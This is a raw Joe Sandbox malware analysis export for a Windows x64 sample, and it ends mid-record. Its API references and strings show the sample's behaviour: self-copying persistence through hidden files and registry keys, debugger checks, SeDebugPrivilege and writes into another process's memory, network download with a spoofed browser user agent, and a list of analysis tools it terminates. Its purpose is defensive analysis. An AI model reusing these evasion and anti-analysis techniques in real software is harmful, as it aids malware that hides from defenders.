                                                                                                                                                                  • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D390D
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3922
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3935
                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3945
                                                                                                                                                                  • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3958
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D396D
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3980
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3995
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                  • Opcode ID: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
                                                                                                                                                                  • Instruction ID: 27af64ff61ff781a150111514a63f49001681e74ee56c479e1837d1c22e4e7dd
                                                                                                                                                                  • Opcode Fuzzy Hash: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
                                                                                                                                                                  • Instruction Fuzzy Hash: 59112422638986D6DB609F26F89876EA362FBC4B91F505031D94E83A29DF3CD405CF40

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF6743D3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6743D3784
                                                                                                                                                                    • Part of subcall function 00007FF6743D3744: GetVolumeInformationW.KERNELBASE ref: 00007FF6743D3801
                                                                                                                                                                    • Part of subcall function 00007FF6743D3744: wsprintfW.USER32 ref: 00007FF6743D38A2
                                                                                                                                                                    • Part of subcall function 00007FF6743D38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D390D
                                                                                                                                                                    • Part of subcall function 00007FF6743D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3922
                                                                                                                                                                    • Part of subcall function 00007FF6743D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3935
                                                                                                                                                                    • Part of subcall function 00007FF6743D38C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3945
                                                                                                                                                                    • Part of subcall function 00007FF6743D38C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3958
                                                                                                                                                                    • Part of subcall function 00007FF6743D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D396D
                                                                                                                                                                    • Part of subcall function 00007FF6743D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3980
                                                                                                                                                                    • Part of subcall function 00007FF6743D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3995
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 00007FF6743D3AB9
                                                                                                                                                                  • DeleteFileW.KERNELBASE ref: 00007FF6743D3AC4
                                                                                                                                                                  • CopyFileW.KERNELBASE ref: 00007FF6743D3ADD
                                                                                                                                                                  • SetFileAttributesW.KERNEL32 ref: 00007FF6743D3AF5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                  • String ID: Services
                                                                                                                                                                  • API String ID: 3209240227-2319745855
                                                                                                                                                                  • Opcode ID: be0043b295d9898150489b8ba5340aa22ed2e55b609d377a08c94104789181f7
                                                                                                                                                                  • Instruction ID: 4545c352f3319674d136e6221a7841f1f5d634186def12e4cbd59b783a5cf020
                                                                                                                                                                  • Opcode Fuzzy Hash: be0043b295d9898150489b8ba5340aa22ed2e55b609d377a08c94104789181f7
                                                                                                                                                                  • Instruction Fuzzy Hash: B0015662B28982D3EB60DB25E4D83AA5360FB94754FA05432D65DC35A8EF3CD64ECF00

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                  • String ID: %08lX%04lX%lu
                                                                                                                                                                  • API String ID: 3001812590-640692576
                                                                                                                                                                  • Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                  • Instruction ID: 37e78dd6a50f63bf1db3f9a8b4bba438eb737e5d9f4c122025590558e1339d30
                                                                                                                                                                  • Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                  • Instruction Fuzzy Hash: 9631C26662C6C1C6DB20DB65E4983AAB3A0FB84754F501136E68D87A98EF7DD909CF00

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3920101602-0
                                                                                                                                                                  • Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                  • Instruction ID: 44ebbc253eaf5049f788e68f207f39ea445752864cfa5f47ed82b8862a421880
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                  • Instruction Fuzzy Hash: F2F0FE26D1C282C2E7304F67E44C3796790AF45B19F641174D98D86594CF6CEA09DF11

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 416 7ff6743d1050-7ff6743d108c LoadLibraryA GetProcAddress
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                                                  • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                  • Instruction ID: 3820437e110c4e42a2dec4e78ce41128f89375a90487a415d3eebbc1aaf959ef
                                                                                                                                                                  • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                  • Instruction Fuzzy Hash: A6E09276518F80C6C6209B15F88401AB7B4FBC8795FA04125EACD82B28DF3CC169CB00

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 420 7ff6743d3b54-7ff6743d3b7a VirtualAlloc
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                  • Opcode ID: b541e8117daad4751c7a279db5381b441ce47fb4f749190da09f5cfabf446e69
                                                                                                                                                                  • Instruction ID: b042fbb1ec5063accf7637c6b5856295701b7c6417b4f103a0cd515291ccee43
                                                                                                                                                                  • Opcode Fuzzy Hash: b541e8117daad4751c7a279db5381b441ce47fb4f749190da09f5cfabf446e69
                                                                                                                                                                  • Instruction Fuzzy Hash: 42C012B1F25141C3D71C9F22E495A0A2A10A745741F904028D60547744CD3DC1514F00

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 417 7ff6743d3b24-7ff6743d3b33 418 7ff6743d3b35-7ff6743d3b42 VirtualFree 417->418 419 7ff6743d3b48-7ff6743d3b4c 417->419 418->419
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                  • Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                  • Instruction ID: 1bc2cc9e907b2793fbe70929ff84efba9dc22ccb6a80da38adcf1a331ba12399
                                                                                                                                                                  • Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                  • Instruction Fuzzy Hash: 41D01222E38D41C2E7949B27E8CD719A3A0FFC4B45F908135E68D81564CF3CC4998F00
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                                  • API String ID: 2379135442-2896544425
                                                                                                                                                                  • Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                  • Instruction ID: f8b93ecbf6992ec900655dbb7c80d44d0c646cc9b14659368d29c392386df773
                                                                                                                                                                  • Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                  • Instruction Fuzzy Hash: 8D413B32628A81C6E7608F52F48876AB7A0FB94765F604135EA9D87A98CF7DD448CF40
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 4073123320-2766056989
                                                                                                                                                                  • Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                  • Instruction ID: d0c0979023834887546c6dcf3b6dce655c2ceb70823ae990bc24938c9c79dbf6
                                                                                                                                                                  • Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                  • Instruction Fuzzy Hash: F941B23261CB85C6E770CB16E49876AB7A0F785B94F204025EACD87B98DF7DD5448F40
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF6743D1D19
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                  • API String ID: 2307068205-2771526726
                                                                                                                                                                  • Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                  • Instruction ID: facf81e3f5e34c1c02651e76a0b091d37732ecd860a1911ae8743436aa39ab63
                                                                                                                                                                  • Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                  • Instruction Fuzzy Hash: CA71DA3652CA81C6E7508F66F49876AB760FBC87A5F601135FA8E83A68CF7CD4448F40
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2693768547-0
                                                                                                                                                                  • Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                  • Instruction ID: 5aa96b47f840c20a5a68339f4c15e3f92efc6ddf27d44ab3027c7b56d7b3d97c
                                                                                                                                                                  • Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                  • Instruction Fuzzy Hash: 6981E376618B81C6EB50CB56F48836AB7A0FBD9BA1F604135EA9D83768DF7CD0458F00
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF6743D45C4: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3117), ref: 00007FF6743D460C
                                                                                                                                                                    • Part of subcall function 00007FF6743D45C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3117), ref: 00007FF6743D4649
                                                                                                                                                                    • Part of subcall function 00007FF6743D45C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3117), ref: 00007FF6743D4654
                                                                                                                                                                    • Part of subcall function 00007FF6743D3B84: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D311C), ref: 00007FF6743D3BC7
                                                                                                                                                                    • Part of subcall function 00007FF6743D3B84: RegSetValueExW.ADVAPI32 ref: 00007FF6743D3BFD
                                                                                                                                                                    • Part of subcall function 00007FF6743D3B84: RegCloseKey.ADVAPI32 ref: 00007FF6743D3C0C
                                                                                                                                                                    • Part of subcall function 00007FF6743D3C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF6743D3C3C
                                                                                                                                                                    • Part of subcall function 00007FF6743D3E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF6743D3E37
                                                                                                                                                                    • Part of subcall function 00007FF6743D3E24: Process32FirstW.KERNEL32 ref: 00007FF6743D3E6A
                                                                                                                                                                    • Part of subcall function 00007FF6743D3E24: CloseHandle.KERNEL32 ref: 00007FF6743D3E7C
                                                                                                                                                                    • Part of subcall function 00007FF6743D3E24: wcscmp.MSVCRT ref: 00007FF6743D3E91
                                                                                                                                                                    • Part of subcall function 00007FF6743D3E24: OpenProcess.KERNEL32 ref: 00007FF6743D3EA7
                                                                                                                                                                    • Part of subcall function 00007FF6743D3E24: TerminateProcess.KERNEL32 ref: 00007FF6743D3ECA
                                                                                                                                                                    • Part of subcall function 00007FF6743D3E24: CloseHandle.KERNEL32 ref: 00007FF6743D3ED8
                                                                                                                                                                    • Part of subcall function 00007FF6743D3E24: Process32NextW.KERNEL32 ref: 00007FF6743D3EEB
                                                                                                                                                                    • Part of subcall function 00007FF6743D3E24: CloseHandle.KERNEL32 ref: 00007FF6743D3EFD
                                                                                                                                                                    • Part of subcall function 00007FF6743D39B4: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF6743D3B0C), ref: 00007FF6743D39E4
                                                                                                                                                                  • Sleep.KERNEL32 ref: 00007FF6743D31C6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                  • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                  • API String ID: 2853470409-928700279
                                                                                                                                                                  • Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                  • Instruction ID: b68ff341e244665ac5caa88f001c1013bc8ff3587a5e8bf52e0f754f1165a902
                                                                                                                                                                  • Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                  • Instruction Fuzzy Hash: 61215867A3C942D2EA04EB66D8D91B86260AF55774FB04531E42DC21F6DF2CAA098E40
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
